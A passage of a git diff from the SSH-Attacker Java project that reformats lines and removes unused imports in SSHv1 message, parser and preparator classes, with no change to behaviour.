{ - this.encryptedChallenge = ModifiableVariableFactory.safelySetValue(this.encryptedChallenge,identityPublicModulus); + this.encryptedChallenge = + ModifiableVariableFactory.safelySetValue( + this.encryptedChallenge, identityPublicModulus); } @Override @@ -57,7 +60,8 @@ public RsaAuthChallengeMessageSSHV1Handler getHandler(SshContext context) { } @Override - public SshMessageParser getParser(SshContext context, InputStream stream) { + public SshMessageParser getParser( + SshContext context, InputStream stream) { return new RsaAuthChallengeMessageSSHV1Parser(context, stream); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/RsaAuthMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/RsaAuthMessageSSH1.java index 90c6b5c89..cd846402f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/RsaAuthMessageSSH1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/RsaAuthMessageSSH1.java @@ -15,15 +15,10 @@ import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; -import de.rub.nds.sshattacker.core.protocol.ssh1.handler.EofMessageSSHV1Handler; import de.rub.nds.sshattacker.core.protocol.ssh1.handler.RsaAuthMessageSSHV1Handler; -import de.rub.nds.sshattacker.core.protocol.ssh1.parser.EofMessageSSHV1Parser; import de.rub.nds.sshattacker.core.protocol.ssh1.parser.RsaAuthMessageSSHV1Parser; -import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.EofMessageSSHV1Preparator; import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.RsaAuthMessageSSHV1Preparator; -import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.EofMessageSSHV1Serializier; import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.RsaAuthMessageSSHV1Serializier; - import java.io.InputStream; public class RsaAuthMessageSSH1 extends SshMessage { @@ -35,12 +30,15 @@ public ModifiableInteger getIdentityPublicModulusBitLenght() { return identityPublicModulusBitLenght; } - public void setIdentityPublicModulusBitLenght(ModifiableInteger identityPublicModulusBitLenght) { + public void setIdentityPublicModulusBitLenght( + ModifiableInteger identityPublicModulusBitLenght) { this.identityPublicModulusBitLenght = identityPublicModulusBitLenght; } public void setIdentityPublicModulusBitLenght(int identityPublicModulusBitLenght) { - this.identityPublicModulusBitLenght = ModifiableVariableFactory.safelySetValue(this.identityPublicModulusBitLenght,identityPublicModulusBitLenght); + this.identityPublicModulusBitLenght = + ModifiableVariableFactory.safelySetValue( + this.identityPublicModulusBitLenght, identityPublicModulusBitLenght); } public ModifiableByteArray getIdentityPublicModulus() { @@ -52,7 +50,9 @@ public void setIdentityPublicModulus(ModifiableByteArray identityPublicModulus) } public void setIdentityPublicModulus(byte[] identityPublicModulus) { - this.identityPublicModulus = ModifiableVariableFactory.safelySetValue(this.identityPublicModulus,identityPublicModulus); + this.identityPublicModulus = + ModifiableVariableFactory.safelySetValue( + this.identityPublicModulus, identityPublicModulus); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/X11OpenMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/X11OpenMessageSSH1.java index af60f04e1..9bc1ec98b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/X11OpenMessageSSH1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/X11OpenMessageSSH1.java @@ -15,15 +15,10 @@ import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; -import de.rub.nds.sshattacker.core.protocol.ssh1.handler.ChannelDataMessageSSHV1Handler; import de.rub.nds.sshattacker.core.protocol.ssh1.handler.X11OpenMessageSSHV1Handler; -import de.rub.nds.sshattacker.core.protocol.ssh1.parser.ChannelDataMessageSSHV1Parser; import de.rub.nds.sshattacker.core.protocol.ssh1.parser.X11OpenMessageSSHV1Parser; -import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ChannelDataMessageSSHV1Preparator; import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.X11OpenMessageSSHV1Preparator; -import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ChannelDataMessageSSHV1Serializier; import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.X11OpenMessageSSHV1Serializier; - import java.io.InputStream; public class X11OpenMessageSSH1 extends SshMessage { @@ -40,10 +35,10 @@ public void setOriginatorString(ModifiableString originatorString) { } public void setOriginatorString(String originatorString) { - this.originatorString = ModifiableVariableFactory.safelySetValue(this.originatorString, originatorString); + this.originatorString = + ModifiableVariableFactory.safelySetValue(this.originatorString, originatorString); } - public ModifiableInteger getLocalChannel() { return localChannel; } @@ -53,7 +48,8 @@ public void setLocalChannel(ModifiableInteger localChannel) { } public void setLocalChannel(int remoteChannel) { - this.localChannel = ModifiableVariableFactory.safelySetValue(this.localChannel, remoteChannel); + this.localChannel = + ModifiableVariableFactory.safelySetValue(this.localChannel, remoteChannel); } @Override @@ -62,8 +58,7 @@ public X11OpenMessageSSHV1Handler getHandler(SshContext context) { } @Override - public SshMessageParser getParser( - SshContext context, InputStream stream) { + public SshMessageParser getParser(SshContext context, InputStream stream) { return new X11OpenMessageSSHV1Parser(context, stream); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/AgentOpenMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/AgentOpenMessageSSHV1Parser.java index ffff59e05..7f8491b22 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/AgentOpenMessageSSHV1Parser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/AgentOpenMessageSSHV1Parser.java @@ -10,11 +10,10 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.ssh1.message.AgentOpenMessageSSH1; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.io.InputStream; - public class AgentOpenMessageSSHV1Parser extends SshMessageParser { private static final Logger LOGGER = LogManager.getLogger(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/AgentRequestForwardingMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/AgentRequestForwardingMessageSSHV1Parser.java index d7eb03562..ef6bcc39a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/AgentRequestForwardingMessageSSHV1Parser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/AgentRequestForwardingMessageSSHV1Parser.java @@ -10,13 +10,12 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.ssh1.message.AgentRequestForwardingMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.EofMessageSSH1; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.io.InputStream; - -public class AgentRequestForwardingMessageSSHV1Parser extends SshMessageParser { +public class AgentRequestForwardingMessageSSHV1Parser + extends SshMessageParser { private static final Logger LOGGER = LogManager.getLogger(); public AgentRequestForwardingMessageSSHV1Parser(SshContext context, InputStream stream) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelCloseConfirmationMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelCloseConfirmationMessageSSHV1Parser.java index 47cdf5904..811ac9f16 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelCloseConfirmationMessageSSHV1Parser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelCloseConfirmationMessageSSHV1Parser.java @@ -10,13 +10,12 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelCloseConfirmationMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelCloseMessageSSH1; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.io.InputStream; - -public class ChannelCloseConfirmationMessageSSHV1Parser extends SshMessageParser { +public class ChannelCloseConfirmationMessageSSHV1Parser + extends SshMessageParser { private static final Logger LOGGER = LogManager.getLogger(); public ChannelCloseConfirmationMessageSSHV1Parser(SshContext context, InputStream stream) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelCloseMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelCloseMessageSSHV1Parser.java index ed8baf5d9..cb48216f8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelCloseMessageSSHV1Parser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelCloseMessageSSHV1Parser.java @@ -10,12 +10,10 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelCloseMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelOpenFailureMessageSSH1; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.io.InputStream; - public class ChannelCloseMessageSSHV1Parser extends SshMessageParser { private static final Logger LOGGER = LogManager.getLogger(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelDataMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelDataMessageSSHV1Parser.java index 36b9f45a0..424a280fc 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelDataMessageSSHV1Parser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelDataMessageSSHV1Parser.java @@ -10,11 +10,10 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelDataMessageSSH1; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.io.InputStream; - public class ChannelDataMessageSSHV1Parser extends SshMessageParser { private static final Logger LOGGER = LogManager.getLogger(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelOpenConfirmationMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelOpenConfirmationMessageSSHV1Parser.java index cddec7595..fa60bbb47 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelOpenConfirmationMessageSSHV1Parser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelOpenConfirmationMessageSSHV1Parser.java @@ -10,12 +10,12 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelOpenConfirmationMessageSSH1; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.io.InputStream; - -public class ChannelOpenConfirmationMessageSSHV1Parser extends SshMessageParser { +public class ChannelOpenConfirmationMessageSSHV1Parser + extends SshMessageParser { private static final Logger LOGGER = LogManager.getLogger(); public ChannelOpenConfirmationMessageSSHV1Parser(SshContext context, InputStream stream) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelOpenFailureMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelOpenFailureMessageSSHV1Parser.java index 36773f114..1305e7eef 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelOpenFailureMessageSSHV1Parser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelOpenFailureMessageSSHV1Parser.java @@ -10,13 +10,12 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelOpenFailureMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitStatusMessageSSH1; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.io.InputStream; - -public class ChannelOpenFailureMessageSSHV1Parser extends SshMessageParser { +public class ChannelOpenFailureMessageSSHV1Parser + extends SshMessageParser { private static final Logger LOGGER = LogManager.getLogger(); public ChannelOpenFailureMessageSSHV1Parser(SshContext context, InputStream stream) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/PortForwardRequestMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/PortForwardRequestMessageSSHV1Parser.java index ae6cd3f34..436483260 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/PortForwardRequestMessageSSHV1Parser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/PortForwardRequestMessageSSHV1Parser.java @@ -10,13 +10,12 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.ssh1.message.PortForwardRequestMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.X11OpenMessageSSH1; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.io.InputStream; - -public class PortForwardRequestMessageSSHV1Parser extends SshMessageParser { +public class PortForwardRequestMessageSSHV1Parser + extends SshMessageParser { private static final Logger LOGGER = LogManager.getLogger(); public PortForwardRequestMessageSSHV1Parser(SshContext context, InputStream stream) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/PortOpenMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/PortOpenMessageSSHV1Parser.java index e07b40785..ab4e68d13 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/PortOpenMessageSSHV1Parser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/PortOpenMessageSSHV1Parser.java @@ -9,13 +9,11 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.PortForwardRequestMessageSSH1; import de.rub.nds.sshattacker.core.protocol.ssh1.message.PortOpenMessageSSH1; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.io.InputStream; - public class PortOpenMessageSSHV1Parser extends SshMessageParser { private static final Logger LOGGER = LogManager.getLogger(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/RsaAuthChallengeMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/RsaAuthChallengeMessageSSHV1Parser.java index 1233477c0..f4e7d7a5e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/RsaAuthChallengeMessageSSHV1Parser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/RsaAuthChallengeMessageSSHV1Parser.java @@ -11,13 +11,13 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.ssh1.message.RsaAuthChallengeMessageSSH1; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - import java.io.InputStream; import java.math.BigInteger; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; -public class RsaAuthChallengeMessageSSHV1Parser extends SshMessageParser { +public class RsaAuthChallengeMessageSSHV1Parser + extends SshMessageParser { private static final Logger LOGGER = LogManager.getLogger(); public RsaAuthChallengeMessageSSHV1Parser(SshContext context, InputStream stream) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/RsaAuthMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/RsaAuthMessageSSHV1Parser.java index 6978568e3..99d45656b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/RsaAuthMessageSSHV1Parser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/RsaAuthMessageSSHV1Parser.java @@ -8,20 +8,13 @@ package de.rub.nds.sshattacker.core.protocol.ssh1.parser; import de.rub.nds.modifiablevariable.util.ArrayConverter; -import de.rub.nds.sshattacker.core.constants.PublicKeyFormat; -import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; -import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; -import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.EofMessageSSH1; import de.rub.nds.sshattacker.core.protocol.ssh1.message.RsaAuthMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - import java.io.InputStream; import java.math.BigInteger; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; public class RsaAuthMessageSSHV1Parser extends SshMessageParser { private static final Logger LOGGER = LogManager.getLogger(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/X11OpenMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/X11OpenMessageSSHV1Parser.java index 5a0d519f6..f291a4927 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/X11OpenMessageSSHV1Parser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/X11OpenMessageSSHV1Parser.java @@ -9,13 +9,11 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelDataMessageSSH1; import de.rub.nds.sshattacker.core.protocol.ssh1.message.X11OpenMessageSSH1; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.io.InputStream; - public class X11OpenMessageSSHV1Parser extends SshMessageParser { private static final Logger LOGGER = LogManager.getLogger(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/AgentOpenMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/AgentOpenMessageSSHV1Preparator.java index 9f05dc930..e2f3d6e47 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/AgentOpenMessageSSHV1Preparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/AgentOpenMessageSSHV1Preparator.java @@ -10,7 +10,6 @@ import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.ssh1.message.AgentOpenMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitStatusMessageSSH1; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/AgentRequestForwardingMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/AgentRequestForwardingMessageSSHV1Preparator.java index b9a49f45c..a8d037000 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/AgentRequestForwardingMessageSSHV1Preparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/AgentRequestForwardingMessageSSHV1Preparator.java @@ -10,16 +10,17 @@ import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.ssh1.message.AgentRequestForwardingMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.EofMessageSSH1; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class AgentRequestForwardingMessageSSHV1Preparator extends SshMessagePreparator { +public class AgentRequestForwardingMessageSSHV1Preparator + extends SshMessagePreparator { private static final Logger LOGGER = LogManager.getLogger(); - public AgentRequestForwardingMessageSSHV1Preparator(Chooser chooser, AgentRequestForwardingMessageSSH1 message) { + public AgentRequestForwardingMessageSSHV1Preparator( + Chooser chooser, AgentRequestForwardingMessageSSH1 message) { super(chooser, message, MessageIdConstantSSH1.SSH_CMSG_AGENT_REQUEST_FORWARDING); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelCloseConfirmationMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelCloseConfirmationMessageSSHV1Preparator.java index 5e4de97cf..d52c6d4af 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelCloseConfirmationMessageSSHV1Preparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelCloseConfirmationMessageSSHV1Preparator.java @@ -10,16 +10,17 @@ import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelCloseConfirmationMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelCloseMessageSSH1; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class ChannelCloseConfirmationMessageSSHV1Preparator extends SshMessagePreparator { +public class ChannelCloseConfirmationMessageSSHV1Preparator + extends SshMessagePreparator { private static final Logger LOGGER = LogManager.getLogger(); - public ChannelCloseConfirmationMessageSSHV1Preparator(Chooser chooser, ChannelCloseConfirmationMessageSSH1 message) { + public ChannelCloseConfirmationMessageSSHV1Preparator( + Chooser chooser, ChannelCloseConfirmationMessageSSH1 message) { super(chooser, message, MessageIdConstantSSH1.SSH_MSG_CHANNEL_CLOSE_CONFIRMATION); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelCloseMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelCloseMessageSSHV1Preparator.java index 5c59de5c1..23a12ef27 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelCloseMessageSSHV1Preparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelCloseMessageSSHV1Preparator.java @@ -10,12 +10,12 @@ import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelCloseMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelOpenFailureMessageSSH1; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class ChannelCloseMessageSSHV1Preparator extends SshMessagePreparator { +public class ChannelCloseMessageSSHV1Preparator + extends SshMessagePreparator { private static final Logger LOGGER = LogManager.getLogger(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelDataMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelDataMessageSSHV1Preparator.java index 525659727..ef65dc818 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelDataMessageSSHV1Preparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelDataMessageSSHV1Preparator.java @@ -10,12 +10,12 @@ import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelDataMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelOpenFailureMessageSSH1; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class ChannelDataMessageSSHV1Preparator extends SshMessagePreparator { +public class ChannelDataMessageSSHV1Preparator + extends SshMessagePreparator { private static final Logger LOGGER = LogManager.getLogger(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelOpenConfirmationMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelOpenConfirmationMessageSSHV1Preparator.java index fb84632fa..4c2a52f20 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelOpenConfirmationMessageSSHV1Preparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelOpenConfirmationMessageSSHV1Preparator.java @@ -10,16 +10,17 @@ import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelOpenConfirmationMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitStatusMessageSSH1; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class ChannelOpenConfirmationMessageSSHV1Preparator extends SshMessagePreparator { +public class ChannelOpenConfirmationMessageSSHV1Preparator + extends SshMessagePreparator { private static final Logger LOGGER = LogManager.getLogger(); - public ChannelOpenConfirmationMessageSSHV1Preparator(Chooser chooser, ChannelOpenConfirmationMessageSSH1 message) { + public ChannelOpenConfirmationMessageSSHV1Preparator( + Chooser chooser, ChannelOpenConfirmationMessageSSH1 message) { super(chooser, message, MessageIdConstantSSH1.SSH_MSG_CHANNEL_OPEN_CONFIRMATION); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelOpenFailureMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelOpenFailureMessageSSHV1Preparator.java index ccb046dc5..9b0e148d1 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelOpenFailureMessageSSHV1Preparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelOpenFailureMessageSSHV1Preparator.java @@ -10,16 +10,17 @@ import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelOpenFailureMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitStatusMessageSSH1; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class ChannelOpenFailureMessageSSHV1Preparator extends SshMessagePreparator { +public class ChannelOpenFailureMessageSSHV1Preparator + extends SshMessagePreparator { private static final Logger LOGGER = LogManager.getLogger(); - public ChannelOpenFailureMessageSSHV1Preparator(Chooser chooser, ChannelOpenFailureMessageSSH1 message) { + public ChannelOpenFailureMessageSSHV1Preparator( + Chooser chooser, ChannelOpenFailureMessageSSH1 message) { super(chooser, message, 